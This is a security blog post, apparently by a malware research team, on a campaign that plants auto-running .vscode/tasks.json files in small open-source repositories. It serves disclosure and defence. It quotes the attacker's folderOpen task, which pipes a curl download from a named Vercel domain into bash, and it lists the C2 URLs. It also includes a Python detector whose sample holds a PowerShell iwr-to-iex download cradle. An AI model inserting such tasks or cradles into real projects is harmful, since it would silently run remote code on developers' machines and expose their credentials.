Small Open-Source Maintainers Targeted by VS Code Tasks Malware
At least 21 small OSS maintainers hit in 72 hours via malicious VS Code task configurations
By c0a15726-c5b1-4b0d-85e6-fe15553df9e2
The OpenSourceMalware team has identified an ongoing campaign targeting open-source maintainers through VS Code task configurations. Over the past 72 hours, we've observed that 21 contributors have had their repositories compromised with potentially malicious .vscode/tasks.json files that silently download and run bash and PowerShell scripts from a third-party domain.
The payloads are innocent…for now.
At this point the payloads from the third-party domain are innocuous and appear to be placeholder throwaway bash and PowerShell scripts. However, we've seen this before! The threat actor can change the payload at any point, and suddenly every compromised user will get the new malicious payload. If the threat actors end up replacing the payloads with something like BeaverTail, they could:
Steal browser credentials and cookies
Exfiltrate cryptocurrency wallet data
Harvest development credentials (Git, SSH keys, API tokens)
Establish persistence for follow-on access
The key takeaway: if you maintain an open-source project, you are a target, regardless of how small or obscure your project may seem.
TL;DR
Threat Actor: Unknown, but using DPRK TTPs
Attack Vector: Malicious .vscode/tasks.json files planted in repositories
Scale: 21 maintainers/contributors compromised in 72 hours
Key Insight: Small project maintainers are being actively targeted
You're not too small to be a target
There's a dangerous misconception in the open-source community: "My project only has a few stars so why would nation-state actors care about me?"
This campaign proves that assumption wrong. Threat actors are systematically targeting maintainers of small, relatively unknown projects. The compromised repositories we've identified aren't major frameworks or widely-used libraries. Rather, they're personal projects, experimental tools, and niche utilities.
The attackers understand something important. Small projects often have:
Less security scrutiny
Maintainers who may be less security-aware
Potential to grow or be incorporated into larger projects
Access to the maintainer's development environment and credentials
21 repositories compromised so far
We identified multiple repositories that have been compromised in this campaign. The following represent just a sample of the 21 compromised maintainers we've identified. The common thread is not project popularity, it's opportunity.
Repository                         Description
ryanmac/code-conductor             Code orchestration tool
anton-abyzov/specweave             Specification tooling
0xBloctopus/thorchain-package      THORChain utilities
dylanlittle/team-moshpit-project   Team project
Our team reached out to the compromised users. In one case, the victim confirmed that they didn't know anything about the tasks file and that it was added without their knowledge. Their assumption is that a GitHub personal access token (PAT) was compromised.
In another conversation, the victim found that stolen SSH keys had been used to authenticate to GitHub and upload the tasks file. So we know the threat actor is acting maliciously; we just don't know what payload they will eventually hit us with.
It could be that some or all of these victims were originally compromised via the Shai-Hulud and S1ngularity attacks. Our team is working with other researchers to figure it out.
For open-source maintainers, the theft of development credentials is particularly concerning because it could enable supply chain attacks on any projects they contribute to.
How malicious VS Code tasks compromise you
The attack leverages VS Code's task runner feature. When a developer opens a project folder in VS Code, task configurations in .vscode/tasks.json can be set to run automatically.
The malicious tasks are configured to execute on folder open, downloading and running platform-specific payloads:
```json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "update-check",
      "type": "shell",
      "command": "curl -s https://vscode-extension-260120.vercel.app/settings/linux?flag=5- | bash",
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}
```
The payload URLs are tailored by operating system:
Linux/macOS: Downloads shell script payload
Windows: Downloads Windows-specific payload
This is a particularly insidious attack because:
It executes automatically when opening the folder
Many developers trust their own repositories
The .vscode folder is often overlooked in code reviews
VS Code's task auto-run behavior is not widely known
How to protect yourself from a VS Code tasks attack vector
All open-source maintainers should:
Disable automatic task execution in VS Code: Set task.allowAutomaticTasks to off
Review `.vscode` folders in any cloned or forked repositories
Be suspicious of unsolicited PRs that modify VS Code configurations
Check your repositories for unexpected .vscode/tasks.json files
Use Git hooks to alert on changes to .vscode directories
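As an added example (not code from the OpenSourceMalware post), a Python checker for the "unexpected .vscode/tasks.json" item above and the folderOpen pattern described earlier: it parses the file as VS Code's JSONC and flags every task that runs on folder open, calling out those whose command fetches or executes remote content. The sample file, the payload.example.invalid domain and the function names are constructed for this example; it also inspects the per-OS "windows"/"linux"/"osx" command overrides, which the post does not mention but which can hide the payload from a reader who only looks at the top-level command.

```python
import json
import re

# Remote fetch-and-execute markers: curl/wget into a shell, PowerShell download cradles.
FETCH_RE = re.compile(
    r"\bcurl\b|\bwget\b|invoke-webrequest|\biwr\b|downloadstring|\biex\b"
    r"|invoke-expression|\|\s*(?:ba)?sh\b|\|\s*(?:pwsh|powershell)\b", re.I)
# JSONC tokens: string literal | // comment | /* */ comment | trailing comma.
_JSONC = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/|,(?=\s*[}\]])', re.S)

def strip_jsonc(text):
    """Turn VS Code's JSONC into strict JSON. Strings are matched first by the
    alternation, so the '//' inside an https:// URL is not taken as a comment."""
    return _JSONC.sub(lambda m: m.group(0) if m.group(0).startswith('"') else "", text)

def task_strings(task):
    """Strings that can reach a shell: command/args plus the per-OS overrides
    (a task may carry its command only under "windows", "linux" or "osx")."""
    found = []
    for scope in (task, *(task.get(k) or {} for k in ("windows", "linux", "osx"))):
        if isinstance(scope.get("command"), str):
            found.append(scope["command"])
        found += [a for a in scope.get("args") or [] if isinstance(a, str)]
    return found

def scan_tasks_json(text):
    """(label, reason) for each folderOpen task; remote fetch/execute is called out."""
    try:
        doc = json.loads(strip_jsonc(text))
    except ValueError as exc:
        return [("<file>", f"unparsable tasks.json: {exc}")]
    findings = []
    for task in doc.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        hits = [s for s in task_strings(task) if FETCH_RE.search(s)]
        reason = ("auto-run + remote fetch: " + hits[0]) if hits else "auto-run task, review"
        findings.append((task.get("label", "?"), reason))
    return findings

# Constructed sample modelled on the campaign's file (placeholder domain, not the
# real IOC); it has a JSONC comment, a trailing comma and a Windows-only override.
SAMPLE = '''{ // tasks auto-run when the folder is opened
  "version": "2.0.0",
  "tasks": [ {
    "label": "update-check", "type": "shell", "command": "echo checking",
    "windows": { "command": "powershell -c \\"iwr https://payload.example.invalid/w | iex\\"" },
    "runOptions": { "runOn": "folderOpen" }, },
    { "label": "build", "type": "shell", "command": "npm run build" } ]
}'''
```

Run scan_tasks_json over every .vscode/tasks.json in a checkout (nested folders included) and treat any finding as a review item; a folderOpen task with no remote fetch is still worth a look, since the command can change in a later commit.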
To check your VS Code settings:
Preferences → Settings → Search "task.allowAutomaticTasks" → Set to "off"
Look for the following IOCs:
C2 Infrastructure
https://vscode-extension-260120.vercel.app/settings/linux?flag=5-
https://vscode-extension-260120.vercel.app/settings/win?flag=5-
vscode-extension-260120.vercel.app
Malicious File Pattern
.vscode/tasks.json (with runOn: folderOpen and curl/wget commands)
How this is similar to North Korean "Contagious Interview" tactics
Separately, the OpenSourceMalware team has been tracking multiple DPRK campaigns that are part of the sprawling “Contagious Interview” set of campaigns targeting software engineers. In particular, the tasks.json files that are being added to these compromised GitHub repositories look EXACTLY like the malicious tasks files being added by DPRK threat actors. Look at the image below. On the left is a malicious payload from an active DPRK Lazarus Group threat. On the right, is one of the tasks.json files from this campaign. They look pretty similar, right?!
This campaign is a stark reminder that in the world of software supply chain attacks, there are no targets too small. DPRK threat actors are casting a wide net, targeting open-source maintainers regardless of project size or visibility.
If you maintain open-source software (even a side project with a handful of stars) take the time to secure your development environment and review your repositories for unexpected changes.